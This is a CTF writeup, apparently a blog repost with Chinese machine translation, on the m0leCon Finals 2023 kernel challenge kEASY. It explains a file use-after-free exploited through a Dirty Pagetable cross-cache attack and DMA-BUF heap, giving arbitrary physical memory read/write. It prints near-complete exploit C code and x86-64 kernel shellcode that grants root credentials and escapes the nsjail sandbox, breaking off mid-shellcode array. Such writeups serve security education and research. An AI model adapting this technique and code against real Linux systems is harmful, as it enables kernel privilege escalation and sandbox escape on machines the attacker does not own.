Understanding Dirty Pagetable – m0leCon Finals 2023 CTF Writeup

WriteUp 5个月前 admin
122 0 0

About 大约

I participated m0leCon Finals 2023 CTF, which was held in Politecnico di Torino, Italy, as a member of std::weak_ptr<moon>*1.
我作为 std::weak_ptr<moon> *1的成员参加了在意大利都灵理工大学举行的m0leCon Finals 2023 CTF。

Among the pwnable challenges I solved during the CTF, a kernel pwn named kEASY was quite interesting, and I’m going to explain about the exploitation technique I used to solve the task.
在我在 CTF 期间解决的 pwnable 挑战中,一个名为 kEASY 的内核 pwn 非常有趣,我将解释我用来解决该任务的开发技术。

Challenge setup 挑战设置

Mitigations 缓解措施

KASLR, SMAP, SMEP, and KPTI are enabled.
启用 KASLR、SMAP、SMEP 和 KPTI。

#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-cpu qemu64,+smep,+smap,+rdrand \
-m 4G \
-smp 4 \
-initrd rootfs.cpio.gz \
-hda flag.txt \
-append console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1 \
-monitor /dev/null \
-nographic \
-no-reboot

Mitigations such as randomization of slab freelist and slab hardening are also enabled. Additionally, the given shell itself is also sandboxed by nsjail, and it prohibits many system calls, as well as the resource limitation such as the number of processes.
此外,还启用了缓解措施,例如板自由列表的随机化和板强化。此外,给定的 shell 本身也被 nsjail 沙盒化,它禁止许多系统调用,以及进程数等资源限制。

Source code 源代码

A kernel module with an ioctl handler defined is working on the system. The handler is defined as the function below:
定义了 ioctl 处理程序的内核模块正在系统上运行。处理程序定义为以下函数:

static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
long ret = –EINVAL;
struct file *myfile;
int fd;
if (!enabled) {
goto out;
}
enabled = 0;
myfile = anon_inode_getfile(“[easy]”, &keasy_file_fops, NULL, 0);
fd = get_unused_fd_flags(O_CLOEXEC);
if (fd < 0) {
ret = fd;
goto err;
}
fd_install(fd, myfile);
if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
ret = –EINVAL;
goto err;
}
ret = 0;
return ret;
err:
fput(myfile);
out:
return ret;
}

It creates an anonymous file named [easy], and a file descriptor is assigned to it. Once it assigns a file descriptor, the number will be copied to user-land buffer.
它创建一个名为 [easy] 的匿名文件,并为其分配一个文件描述符。一旦它分配了文件描述符,该数字将被复制到用户空间缓冲区。

This feature can only be called once*2 after the boot.
此功能只能在启动后调用一次 *2。

Vulnerability  脆弱性

If copy_to_user fails after the file descriptor is assigned by fd_install, the execution goes to err and fput will be called. fput decrements the reference count of a file. The counter will become zero in this case because the anonymous file is not shared, and the structure allocated for the file will be freed.
如果 copy_to_user 在 分配文件描述符后失败 fd_install ,则执行将转到 err 并将 fput 被调用。 fput 递减文件的引用计数。在这种情况下,计数器将变为零,因为匿名文件未共享,并且为该文件分配的结构将被释放。

It means that Use-after-Free occurs if copy_to_user failes because the file itself is freed while the file descriptor is alive in user-land.
这意味着,如果 copy_to_user 失败,则会发生释放后使用,因为文件本身在用户空间中处于活动状态时被释放。

Confirming the bug 确认错误

We can easily make copy_to_user fail if we pass an invalid address, which will cause Use-after-Free. Since the file descriptor will be the smallest possible number, we can speculate the number even if ioctl fails.
如果我们传递一个无效的地址,我们很容易失败 copy_to_user ,这将导致释放后使用。由于文件描述符将是尽可能小的数字,因此即使 ioctl 失败,我们也可以推测该数字。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>
void fatal(const char *msg) {
perror(msg);
exit(1);
}
int main() {
// Open vulnerable device
int fd = open(“/dev/keasy”, O_RDWR);
if (fd == –1)
fatal(“/dev/keasy”);
// Get dangling file descriptor
int ezfd = fd + 1;
if (ioctl(fd, 0, 0xdeadbeef) == 0)
fatal(“ioctl did not fail”);
// Use-after-free
char buf[4];
read(ezfd, buf, 4);
return 0;
}

We can confirm the kernel crashes when we execute the code above.
我们可以确认在执行上述代码时内核崩溃。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup
UAF confirmed UAF确认

What makes the exploit hard is that UAF occurs on a dedicated slab cache [1] instead of a generic slab cache. A file structure is allocated using a dedicated slab cache named files_cache
漏洞利用的困难在于 UAF 发生在专用 slab 缓存 [1] 上,而不是通用 slab 缓存上。 file 使用名为 files_cache

# cat /proc/slabinfo | grep files_cache
files_cache          920    920    704   23    4 : tunables    0    0    0 : slabdata     40     40      0

Therefore, objects other than files will not usually overlap after Use-after-Free unlike objects allocated with kmalloc, which makes the exploit difficult.
因此,文件以外的对象在释放后使用后通常不会重叠,这与分配了 的 kmalloc 对象不同,这使得利用变得困难。

Cross-Cache Attack 交叉缓存攻击

Still, we can use an exploitation technique named cross-cache attack to exploit heap vulnerability that occurs on a dedicated cache. There are several attacks related to cross-cache such as Dirty Cred [2] and Dirty Pagetable.
不过,我们可以使用一种名为交叉缓存攻击的利用技术来利用专用缓存上发生的堆漏洞。有几种与交叉缓存相关的攻击,例如 Dirty Cred [2] 和 Dirty Pagetable。

The principle of cross-cache attack is simple, and I’m going to explain about attacks against Use-after-Free.
跨缓存攻击的原理很简单,我将解释针对释放后使用的攻击。

First of all, we spray objects allocated in the dedicated cache as described in ① and ② in the figure below.
首先,我们喷洒分配在专用缓存中的对象,如下图(1)和(2)所述。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Secondly, we free the UAF object as in ③ *3.
其次,我们释放 UAF 对象,如 (3) *3 所示。

Finally, if we free every object sprayed, the slab page will also be freed since every object in this slab cache is no longer used.
最后,如果我们释放每个喷洒的对象,则 slab 页面也将被释放,因为此 slab 缓存中的每个对象都不再使用。

The buddy system in Linux manages pages, and a freed page can be used for different purpose later on. Therefore, we can overlap the UAF file object with a structure completely different from files. とができます。
Linux 中的好友系统管理页面,释放的页面可以在以后用于不同的目的。因此,我们可以将 UAF 文件对象与文件完全不同的结构重叠。とができます。

We will overwrite the cred structure used for managing privilege of a process in the Dirty Cred attack. However, we need some other attacks since the target is a file structure this time.
我们将覆盖用于在 Dirty Cred 攻击中管理进程权限的 cred 结构。但是,我们需要一些其他攻击,因为这次的目标是文件结构。

Dirty Pagetable 肮脏的页面表

I used a technique named Dirty Pagetable to solve this challenge.
我使用了一种名为 Dirty Pagetable 的技术来解决这个挑战。

How it works 运作方式

Just as Dirty Cred sets the cred structure as the attack target, Dirty Pagetable sets the page table as the attack target.
正如 Dirty Cred 将 cred 结构设置为攻击目标一样,Dirty Pagetable 将页表设置为攻击目标。

In x86-64 Linux, a 4-level page table is usually used to convert virtual addresses to physical addresses. Dirty Pagetable targets the PTE (Page Table Entry), which is the last level just before physical memory. In Linux, when a new PTE is required, the page for the PTE is also allocated with using the Buddy System.
在 x86-64 Linux 中,通常使用 4 级页表将虚拟地址转换为物理地址。脏页表以 PTE(页表条目)为目标,这是物理内存之前的最后一个级别。在 Linux 中,当需要新的 PTE 时,PTE 的页面也会使用 Buddy System 进行分配。

Therefore, we can allocate a PTE on the same page where the dangling file pointer is located. The following figure describes the situation*4.
因此,我们可以在悬空文件指针所在的同一页面上分配一个 PTE。情况如下图所示*4。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

The following code overlaps a UAF object with a PTE. Remember to limit the number of CPUs to one so that the slab cache of the same CPU is used, since the process is running in a multi-threaded environment this time.
以下代码将 UAF 对象与 PTE 重叠。请记住将 CPU 的数量限制为 1,以便使用同一 CPU 的 slab 缓存,因为这次该进程在多线程环境中运行。

void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
int main() {
int file_spray[N_FILESPRAY];
void *page_spray[N_PAGESPRAY];
// Pin CPU (important!)
bind_core(0);
// Open vulnerable device
int fd = open(“/dev/keasy”, O_RDWR);
if (fd == –1)
fatal(“/dev/keasy”);
// Prepare pages (PTE not allocated at this moment)
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_SHARED, –1, 0);
if (page_spray[i] == MAP_FAILED) fatal(“mmap”);
}
puts(“[+] Spraying files…”);
// Spray file (1)
for (int i = 0; i < N_FILESPRAY/2; i++)
if ((file_spray[i] = open(“/”, O_RDONLY)) < 0) fatal(“/”);
// Get dangling file descriptorz
int ezfd = file_spray[N_FILESPRAY/21] + 1;
if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
fatal(“ioctl did not fail”);
// Spray file (2)
for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
if ((file_spray[i] = open(“/”, O_RDONLY)) < 0) fatal(“/”);
puts(“[+] Releasing files…”);
// Release the page for file slab cache
for (int i = 0; i < N_FILESPRAY; i++)
close(file_spray[i]);
puts(“[+] Allocating PTEs…”);
// Allocate many PTEs (page fault)
for (int i = 0; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = ‘A’ + j;
getchar();
return 0;
}

The file structure right before it gets freed by fput:
文件结构在被释放之前由以下方法 fput 释放:

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

After the PTE spray finishes, we will find a PTE-like data is allocated on the same address:
PTE喷涂完成后,我们会发现在同一个地址上分配了一个类似PTE的数据:

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

One of the entry points to the following physical memory, where we can find the data we wrote, which means the PTE is allocated for one of the sprayed pages.
以下物理内存的入口之一,我们可以在其中找到我们写入的数据,这意味着 PTE 被分配给其中一个喷涂页面。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Ideally, we want to overwrite this PTE, and make a user-land virtual address point to a kernel-land physical address. How we can overwrite PTE depends on the vulnerable object. Let’s consider the case of a file structure.
理想情况下,我们希望覆盖此 PTE,并使用户 land 虚拟地址指向内核 land 物理地址。如何覆盖 PTE 取决于易受攻击的对象。让我们考虑一下文件结构的情况。

Exploitation for a file structure
对文件结构的利用

It is a bit hard to exploit a file structure because it has few fields we can control. The original article [3] explains about a method using dup, and we will also be using it.
利用文件结构有点困难,因为它几乎没有我们可以控制的字段。原文 [3] 解释了使用 dup 的方法,我们也将使用它。

A file structure has a filed named f_count at offset 0x38 from the beginning.
文件结构具有从开头开始0x38的偏移量命名 f_count 的字段。

struct file {
union {
struct llist_node f_llist;
struct rcu_head f_rcuhead;
unsigned int f_iocb_flags;
};
/*
* Protects f_ep, f_flags.
* Must not be taken from IRQ context.
*/
spinlock_t f_lock;
fmode_t f_mode;
atomic_long_t f_count;
struct mutex f_pos_lock;

f_count represents the reference count of the file object, and will be incremented when we call dup system call to duplicate the file descriptor. Therefore, we obtain a primitive to increment a pointer in the PTE.
f_count 表示 File 对象的引用计数,当我们调用系统调用 dup 来复制文件描述符时,引用计数会递增。因此,我们获取一个基元来递增 PTE 中的指针。

So, can we simply call a lot of dup to make an entry in PTE point to kernel-land physical address?

It is not so simple, unfortunately.

Most of the physical addresses are randomized when KASLR is enabled. In addition, physical memory allocated for user-land exists at much lower address than physical memory for kernel-land, and the offset is big.

A process can have up to 65535 file descriptors in this environment, which limits the number of increments we can call. One solution is to use fork to separate the processes to bypass the limitation, but it is not possible this time because we can execute only 2 processes due to nsjail.

Therefore, we need to find other ways to make user-land virtual address point to kernel-land physical address.

UAF in physical memory
物理内存中的 UAF

So far, the UAF file object is located at the same physical address as PTE as described in the figure below:
到目前为止,UAF 文件对象位于与 PTE 相同的物理地址,如下图所述:

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Here, if we call dup 0x1000 times, the entry at the location corresponding to f_count in the PTE will point to the next page, so that the entries in the two PTEs point to the same physical address.
在这里,如果我们调用 dup 0x1000 次,则 PTE 中对 f_count 应位置的条目将指向下一页,因此两个 PTE 中的条目指向相同的物理地址。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

After this modification, we can find the overlapping page by trying to read each page and check if the data written in the page changed.
修改后,我们可以通过尝试读取每个页面并检查页面中写入的数据是否更改来找到重叠页面。

/**
* 4. Modify PTE entry to overlap 2 physical pages
*/
// Increment physical address
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
fatal(“dup”);
puts(“[+] Searching for overlapping page…”);
// Search for page that overlaps with other physical page
void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
// We wrote ‘H'(=’A’+7) but if it changes the PTE overlaps with the file
if (*(char*)(page_spray[i] + 7*0x1000) != ‘A’ + 7) { // +38h: f_count
evil = page_spray[i] + 0x7000;
printf(“[+] Found overlapping page: %p\n, evil);
break;
}
}
if (evil == NULL) fatal(“target not found :(“);

We can detect the overlapping pages as shown below:
我们可以检测到重叠的页面,如下所示:

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Checking the physical address of the detected page, we will find that 2 user-land virtual addresses point to the same physical address.
检查检测到的页面的物理地址,我们会发现 2 个用户空间虚拟地址指向同一个物理地址。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Note that overlapping is not important here, but the fact that we could find out the user-land virtual address corresponding to the PTE we can corrupt is important.
请注意,重叠在这里并不重要,但我们可以找出与我们可以破坏的 PTE 相对应的用户空间虚拟地址这一事实很重要。

Arbitrary Physical Address Read/Write
任意物理地址读/写

As mentioned earlier, we cannot reach the kernel-land physical memory simply by calling a lot of dup system calls because of the distance between user-land and kernel-land physical memory. To resolve this problem, I used DMA-BUF Heap this time((The original article also mentions io_uring but it is not available because of nsjail.)).
如前所述,由于用户空间和内核空间物理内存之间的距离,我们无法仅通过调用大量 dup 系统调用来达到内核-土地物理内存。为了解决这个问题,我这次使用了 DMA-BUF Heap((原文也提到了 io_uring ,但由于 nsjail 而不可用。

DMA-BUF [4] is a memory for fast and secure access between multiple devices. We can open the DMA device at /dev/dma_heap/system to control DMA-BUF Heap. Calling DMA_HEAP_IOCTL_ALLOC ioctl to this device, we can allocate a memory that can be mapped to user-land.
DMA-BUF [4] 是一种用于在多个设备之间快速安全访问的存储器。我们可以打开 DMA 设备来 /dev/dma_heap/system 控制 DMA-BUF 堆。将 ioctl 调用 DMA_HEAP_IOCTL_ALLOC 到此设备,我们可以分配一个可以映射到用户空间的内存。

The page mapped throught this ioctl is different from a page mapped by mmap. It will be allocated on physical memory close to PTEs *5.
通过此 ioctl 映射的页面与由 mmap 映射的页面不同。它将在接近 PTE *5 的物理内存上分配。

So, if we prepare a DMA-BUF Heap page as the target PTE entry which we can corrupt with f_count, we can realize the following situation. (We have to allocate DMA-BUF Heap during PTE spray in order to allocate another PTE next to the DMA page.)
因此,如果我们准备一个 DMA-BUF 堆页面作为目标 PTE 条目,我们可以用它来 f_count 损坏,我们可以实现以下情况。(我们必须在 PTE 喷涂期间分配 DMA-BUF 堆,以便在 DMA 页面旁边分配另一个 PTE。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Since we already know which user-land page can corrupt the PTE, we will munmap it and mmap the DMA-BUF Heap page to make f_count overlap with the PTE entry for the DMA-BUF Heap page.
由于我们已经知道哪个用户空间页面可以损坏 PTE,因此我们将 munmap 它和 mmap DMA-BUF 堆页面与 DMA-BUF 堆页面的 PTE 条目重叠 f_count 。

What is important is that a PTE exists next to the page allocated with DMA-BUF Heap. Therefore, if we again call dup 0x1000 times to increment f_count, the DMA-BUF Heap page mapped to user-land will point to a PTE.
重要的是,PTE 存在于使用 DMA-BUF 堆分配的页面旁边。因此,如果我们再次调用 dup 0x1000 次 increment f_count ,映射到 user-land 的 DMA-BUF 堆页面将指向 PTE。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Since we can read and write the DMA-BUF page mapped to user-land, we obtain a primitive to fully control a PTE. So, we can modify the PTE entries and make one of them point to arbitrary physical addresses, including kernel-land.
由于我们可以读取和写入映射到用户空间的 DMA-BUF 页面,因此我们获得了一个完全控制 PTE 的原语。因此,我们可以修改 PTE 条目,并使其中一个指向任意物理地址,包括 kernel-land。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

This is how we can achieve arbitrary physical address read/write.
这就是我们实现任意物理地址读/写的方式。

If we run the following code, the page allocated with DMA-BUF will be adjacent to a PTE.
如果我们运行以下代码,则使用 DMA-BUF 分配的页面将与 PTE 相邻。

/**
* 3. Overlap UAF file with PTE
*/
puts(“[+] Allocating PTEs…”);
// Allocate many PTEs (1)
for (int i = 0; i < N_PAGESPRAY/2; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = ‘A’ + j;
// Allocate DMA-BUF heap
int dma_buf_fd = –1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
fatal(“DMA_HEAP_IOCTL_ALLOC”);
printf(“[+] dma_buf_fd: %d\n, dma_buf_fd = data.fd);
// Allocate many PTEs (2)
for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = ‘A’ + j;
/**
* 4. Modify PTE entry to overlap 2 physical pages
*/
// Increment physical address
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
fatal(“dup”);
puts(“[+] Searching for overlapping page…”);
// Search for page that overlaps with other physical page
void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
// We wrote ‘H'(=’A’+7) but if it changes the PTE overlaps with the file
if (*(char*)(page_spray[i] + 7*0x1000) != ‘A’ + 7) { // +38h: f_count
evil = page_spray[i] + 0x7000;
printf(“[+] Found overlapping page: %p\n, evil);
break;
}
}
if (evil == NULL) fatal(“target not found :(“);
// Place PTE entry for DMA buffer onto controllable PTE
puts(“[+] Remapping…”);
munmap(evil, 0x1000);
void *dma = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
*(char*)dma = ‘0’;

Checking on gdb, we can find that a PTE is allocated at the address where the dangling file object was, and physical address for DMA-BUF is located at the offset corresponding to f_count. Additionally, the page next to DMA-BUF looks like another PTE.
检查 gdb,我们可以发现 PTE 分配在悬空文件对象所在的地址,而 DMA-BUF 的物理地址位于对应的 f_count 偏移量处。此外,DMA-BUF 旁边的页面看起来像另一个 PTE。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Therefore, we can call dup 0x1000 times to corrupt a PTE.
因此,我们可以调用 dup 0x1000次来破坏 PTE。

/**
* Get physical AAR/AAW
*/
// Corrupt physical address of DMA-BUF
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
fatal(“dup”);
printf(“[+] DMA-BUF now points to PTE: 0x%016lx\n, *(size_t*)dmabuf);

Leaking physical base address
物理基址泄漏

Reading and writing physical address will not fail regardless of the permission. So, we can search for specific machine codes or magic numbers to spot the physical address of the kernel.
无论权限如何,读取和写入物理地址都不会失败。因此,我们可以搜索特定的机器代码或幻数来发现内核的物理地址。

Although it’s already 2024, we can find some fixed physical addresses on both Linux and Windows.
虽然已经是 2024 年了,但我们可以在 Linux 和 Windows 上找到一些固定的物理地址。

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

The pages around here is always fixed, and data for page table is left. (Credit to shift_crops who found it during HITCON.) The page table has a pointer to kernel-land physical address, which is useful for leaking the physical base address of the kernel.
此处的页面始终是固定的,并且保留了页表的数据。(感谢在 HITCON 期间发现它的shift_crops。页表有一个指向内核-land 物理地址的指针,这对于泄漏内核的物理基址很有用。

// Leak kernel physical base
void *wwwbuf = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_spray[i] == evil) continue;
if (*(size_t*)page_spray[i] > 0xffff) {
wwwbuf = page_spray[i];
printf(“[+] Found victim page table: %p\n, wwwbuf);
break;
}
}
size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) – 0x1c04000;
printf(“[+] Physical kernel base address: 0x%016lx\n, phys_base);

Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup

Escaping from nsjail 逃离 nsjail

This time we need to escape from nsjail as well as privilege escalation. Since it is complicated, let’s execute a shellcode in kernel space.
这一次,我们需要逃离 nsjail 以及权限升级。由于它很复杂,让我们在内核空间中执行一个 shellcode。

We can simply overwrite the machine code of some random function in the Linux kernel with our shellcode because we have AAW primitive on physical memory. I modified do_symlinkat, which can be called inside nsjail. We can call symlink function in C to reach this kernel function.
我们可以简单地用我们的 shellcode 覆盖 Linux 内核中某些随机函数的机器代码,因为我们在物理内存上有 AAW 原语。我修改 do_symlinkat 了,可以在 nsjail 中调用。我们可以在 C 中调用 symlink 函数来达到这个内核函数。

Refer to [5] for what the shellcode is doing.
请参阅 [5] 了解 shellcode 的作用。

  init_cred         equ 0x1445ed8
  commit_creds      equ 0x00ae620
  find_task_by_vpid equ 0x00a3750
  init_nsproxy      equ 0x1445ce0
  switch_task_namespaces equ 0x00ac140
  init_fs                equ 0x1538248
  copy_fs_struct         equ 0x027f890
  kpti_bypass            equ 0x0c00f41

_start:
  endbr64
  call a
a:
  pop r15
  sub r15, 0x24d4c9

  ; commit_creds(init_cred) [3]
  lea rdi, [r15 + init_cred]
  lea rax, [r15 + commit_creds]
  call rax

  ; task = find_task_by_vpid(1) [4]
  mov edi, 1
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; switch_task_namespaces(task, init_nsproxy) [5]
  mov rdi, rax
  lea rsi, [r15 + init_nsproxy]
  lea rax, [r15 + switch_task_namespaces]
  call rax

  ; new_fs = copy_fs_struct(init_fs) [6]
  lea rdi, [r15 + init_fs]
  lea rax, [r15 + copy_fs_struct]
  call rax
  mov rbx, rax

  ; current = find_task_by_vpid(getpid())
  mov rdi, 0x1111111111111111   ; will be fixed at runtime
  lea rax, [r15 + find_task_by_vpid]
  call rax

  ; current->fs = new_fs [8]
  mov [rax + 0x740], rbx

  ; kpti trampoline [9]
  xor eax, eax
  mov [rsp+0x00], rax
  mov [rsp+0x08], rax
  mov rax, 0x2222222222222222   ; win
  mov [rsp+0x10], rax
  mov rax, 0x3333333333333333   ; cs
  mov [rsp+0x18], rax
  mov rax, 0x4444444444444444   ; rflags
  mov [rsp+0x20], rax
  mov rax, 0x5555555555555555   ; stack
  mov [rsp+0x28], rax
  mov rax, 0x6666666666666666   ; ss
  mov [rsp+0x30], rax
  lea rax, [r15 + kpti_bypass]
  jmp rax

  int3

以下が最終的なexploitです。 这是最终的漏洞利用:

#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#define N_PAGESPRAY 0x200
#define N_FILESPRAY 0x100
#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
typedef unsigned long long u64;
typedef unsigned int u32;
struct dma_heap_allocation_data {
u64 len;
u32 fd;
u32 fd_flags;
u64 heap_flags;
};
void fatal(const char *msg) {
perror(msg);
exit(1);
}
void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
unsigned long user_cs, user_ss, user_rsp, user_rflags;
static void save_state() {
asm(
“movq %%cs, %0\n
“movq %%ss, %1\n
“movq %%rsp, %2\n
“pushfq\n
“popq %3\n
: “=r”(user_cs), “=r”(user_ss), “=r”(user_rsp), “=r”(user_rflags)
:
: “memory”);
}
int fd, dmafd, ezfd = –1;
static void win() {
char buf[0x100];
int fd = open(“/dev/sda”, O_RDONLY);
if (fd < 0) {
puts(“[-] Lose…”);
} else {
puts(“[+] Win!”);
read(fd, buf, 0x100);
write(1, buf, 0x100);
puts(“[+] Done”);
}
exit(0);
}
int main() {
int file_spray[N_FILESPRAY];
void *page_spray[N_PAGESPRAY];
/**
* 1. Setup
*/
// Pin CPU (important!)
bind_core(0);
save_state();
// Open vulnerable device
int fd = open(“/dev/keasy”, O_RDWR);
if (fd == –1)
fatal(“/dev/keasy”);
// Open DMA-BUF
int dmafd = creat(“/dev/dma_heap/system”, O_RDWR);
if (dmafd == –1)
fatal(“/dev/dma_heap/system”);
// Prepare pages (PTE not allocated at this moment)
for (int i = 0; i < N_PAGESPRAY; i++) {
page_spray[i] = mmap((void*)(0xdead0000UL + i*0x10000UL),
0x8000, PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_SHARED, –1, 0);
if (page_spray[i] == MAP_FAILED) fatal(“mmap”);
}
/**
* 2. Release the page where dangling file points
*/
puts(“[+] Spraying files…”);
// Spray file (1)
for (int i = 0; i < N_FILESPRAY/2; i++)
if ((file_spray[i] = open(“/”, O_RDONLY)) < 0) fatal(“/”);
// Get dangling file descriptorz
int ezfd = file_spray[N_FILESPRAY/21] + 1;
if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
fatal(“ioctl did not fail”);
// Spray file (2)
for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
if ((file_spray[i] = open(“/”, O_RDONLY)) < 0) fatal(“/”);
puts(“[+] Releasing files…”);
// Release the page for file slab cache
for (int i = 0; i < N_FILESPRAY; i++)
close(file_spray[i]);
/**
* 3. Overlap UAF file with PTE
*/
puts(“[+] Allocating PTEs…”);
// Allocate many PTEs (1)
for (int i = 0; i < N_PAGESPRAY/2; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = ‘A’ + j;
// Allocate DMA-BUF heap
int dma_buf_fd = –1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
fatal(“DMA_HEAP_IOCTL_ALLOC”);
printf(“[+] dma_buf_fd: %d\n, dma_buf_fd = data.fd);
// Allocate many PTEs (2)
for (int i = N_PAGESPRAY/2; i < N_PAGESPRAY; i++)
for (int j = 0; j < 8; j++)
*(char*)(page_spray[i] + j*0x1000) = ‘A’ + j;
/**
* 4. Modify PTE entry to overlap 2 physical pages
*/
// Increment physical address
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
fatal(“dup”);
puts(“[+] Searching for overlapping page…”);
// Search for page that overlaps with other physical page
void *evil = NULL;
for (int i = 0; i < N_PAGESPRAY; i++) {
// We wrote ‘H'(=’A’+7) but if it changes the PTE overlaps with the file
if (*(char*)(page_spray[i] + 7*0x1000) != ‘A’ + 7) { // +38h: f_count
evil = page_spray[i] + 0x7000;
printf(“[+] Found overlapping page: %p\n, evil);
break;
}
}
if (evil == NULL) fatal(“target not found :(“);
// Place PTE entry for DMA buffer onto controllable PTE
puts(“[+] Remapping…”);
munmap(evil, 0x1000);
void *dmabuf = mmap(evil, 0x1000, PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
*(char*)dmabuf = ‘0’;
/**
* Get physical AAR/AAW
*/
// Corrupt physical address of DMA-BUF
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
fatal(“dup”);
printf(“[+] DMA-BUF now points to PTE: 0x%016lx\n, *(size_t*)dmabuf);
// Leak kernel physical base
void *wwwbuf = NULL;
*(size_t*)dmabuf = 0x800000000009c067;
for (int i = 0; i < N_PAGESPRAY; i++) {
if (page_spray[i] == evil) continue;
if (*(size_t*)page_spray[i] > 0xffff) {
wwwbuf = page_spray[i];
printf(“[+] Found victim page table: %p\n, wwwbuf);
break;
}
}
size_t phys_base = ((*(size_t*)wwwbuf) & ~0xfff) – 0x1c04000;
printf(“[+] Physical kernel base address: 0x%016lx\n, phys_base);
/**
* Overwrite setxattr
*/
puts(“[+] Overwriting do_symlinkat…”);
size_t phys_func = phys_base + 0x24d4c0;
*(size_t*)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 